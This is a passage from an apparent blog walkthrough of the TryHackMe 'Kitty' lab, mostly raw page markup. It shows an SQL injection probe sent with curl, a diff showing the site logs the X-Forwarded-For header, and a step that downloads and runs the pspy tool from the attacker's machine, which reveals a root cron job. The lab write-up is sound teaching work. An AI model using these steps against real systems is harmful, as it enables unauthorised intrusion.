5.4.0-139-generic x86_64)<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbf2aba&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbf2aba\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"471\" data-attachment-id=\"445\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-21-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?fit=1077%2C495&amp;ssl=1\" data-orig-size=\"1077,495\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-21\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?fit=1024%2C471&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?resize=1024%2C471&#038;ssl=1\" alt=\"\" class=\"wp-image-445\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?resize=1024%2C471&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?resize=300%2C138&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?resize=768%2C353&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-21.png?w=1077&amp;ssl=1 1077w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Both websites seem to be working the same way. If we try SQLi, it gives us the below message.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ curl 'http:\/\/127.0.0.1:9090\/index.php' -d &quot;username=blah' OR '1'='1-- -&amp;password=a&quot; -H 'X-Forwarded-For: blahblah'\n\nSQL Injection detected. This incident will be logged!  \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">http:\/\/127.0.0.1:9090\/index.php<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-d<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">username=blah&#39; OR &#39;1&#39;=&#39;1-- -&amp;password=a<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-H<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">X-Forwarded-For: blahblah<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Injection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">detected.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">This<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">incident<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">will<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">be<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">logged!<\/span><span style=\"color: #BABED8\">  <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/var\/www\/development$ tail logged\nblahblah\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/var\/www\/development$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tail<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">logged<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">blahblah<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we compare the source code for both web pages, we see that the development site tries to\u00a0<strong>log the IP <\/strong>of a visitor\u00a0using the<strong>\u00a0X-Forwarded-For<\/strong>\u00a0header whenever an\u00a0SQL Injection attempt\u00a0takes place. It logs this on a file located in\u00a0<strong>\/var\/www\/development\/logged<\/strong>.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/var\/www$ diff development\/index.php html\/index.php \n19,21d18\n&lt; \t\t$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];\n&lt; \t\t$ip .= &quot;\\n&quot;;\n&lt; \t\tfile_put_contents(&quot;\/var\/www\/development\/logged&quot;, $ip);\n24,27c21\n&lt; \t\techo 'SQL Injection detected. This incident will be logged!';\n&lt; \t\t$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];\n&lt; \t\t$ip .= &quot;\\n&quot;;\n&lt; \t\tfile_put_contents(&quot;\/var\/www\/development\/logged&quot;, $ip);\t\n---\n&gt; \t\techo 'SQL Injection detected. This incident will be logged!';\t\n67c61\n&lt;         &lt;h2&gt;Development User Login&lt;\/h2&gt;\n---\n&gt;         &lt;h2&gt;User Login&lt;\/h2&gt;\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/var\/www$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">diff<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">development\/index.php<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">html\/index.php<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">19,21d18<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\t$ip = $_SERVER<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">HTTP_X_FORWARDED_FOR<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">];<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\t$ip .= <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\\n<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\tfile_put_contents<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">&quot;\/var\/www\/development\/logged&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> $ip<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">24,27c21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\techo <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">SQL Injection detected. This incident will be logged!<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\t$ip = $_SERVER<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">HTTP_X_FORWARDED_FOR<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">];<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\t$ip .= <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\\n<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \t\tfile_put_contents<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">&quot;\/var\/www\/development\/logged&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> $ip<\/span><span style=\"color: #89DDFF\">);<\/span><span style=\"color: #BABED8\">\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">---<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> \t\techo <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">SQL Injection detected. This incident will be logged!<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\">\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">67c61<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">h<\/span><span style=\"color: #89DDFF\">2&gt;<\/span><span style=\"color: #BABED8\">Development User Login<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/h<\/span><span style=\"color: #89DDFF\">2&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">---<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">h<\/span><span style=\"color: #89DDFF\">2&gt;<\/span><span style=\"color: #BABED8\">User Login<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/h<\/span><span style=\"color: #89DDFF\">2&gt;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Running <em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">PSPY <\/mark><\/em>revealed a cron job run by root every minute and modifying the file located at <strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">\/opt_log_checker.sh<\/mark><\/strong><\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/tmp$ wget http:\/\/10.13.1.112\/pspy\n--2024-02-06 01:43:09--  http:\/\/10.13.1.112\/pspy\nConnecting to 10.13.1.112:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3104768 (3.0M) [application\/octet-stream]\nSaving to: \u2018pspy\u2019\n\npspy                       100%[========================================&gt;]   2.96M   303KB\/s    in 11s     \n\n2024-02-06 01:43:20 (264 KB\/s) - \u2018pspy\u2019 saved [3104768\/3104768]\n\nkitty@kitty:\/tmp$ chmod +x pspy \nkitty@kitty:\/tmp$ .\/pspy \npspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d\n\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591    \n                               \n ..&lt;SNIPPED&gt;..\n \n2024\/02\/06 01:43:32 CMD: UID=0     PID=1      | \/sbin\/init maybe-ubiquity \n2024\/02\/06 01:44:01 CMD: UID=0     PID=1616   | \/usr\/sbin\/CRON -f \n2024\/02\/06 01:44:01 CMD: UID=0     PID=1615   | \/usr\/sbin\/CRON -f \n2024\/02\/06 01:44:01 CMD: UID=0     PID=1617   | \/bin\/sh -c \/usr\/bin\/bash \/opt\/log_checker.sh \n2024\/02\/06 01:44:01 CMD: UID=0     PID=1618   | \/usr\/bin\/bash \/opt\/log_checker.sh \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">wget<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.13.1.112\/pspy<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--2024-02-06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:43:09--<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http:\/\/10.13.1.112\/pspy<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Connecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.13<\/span><span style=\"color: #C3E88D\">.1.112:80...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connected.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">request<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">sent,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">awaiting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">response...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Length:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3104768<\/span><span style=\"color: #BABED8\"> (3.0M) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">application\/octet-stream<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Saving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2018pspy\u2019<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">pspy<\/span><span style=\"color: #BABED8\">                       <\/span><span style=\"color: #F78C6C\">100<\/span><span style=\"color: #C3E88D\">%[=======================================<\/span><span style=\"color: #BABED8\">=<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #C3E88D\">]<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">2.96<\/span><span style=\"color: #C3E88D\">M<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">303<\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">s<\/span><span style=\"color: #BABED8\">     <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024-02-06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:43:20<\/span><span style=\"color: #BABED8\"> (264 <\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">) - \u2018pspy\u2019 saved <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">3104768<\/span><span style=\"color: #BABED8\">\/3104768<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">chmod<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">+x<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">pspy<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">.\/pspy<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">pspy<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> 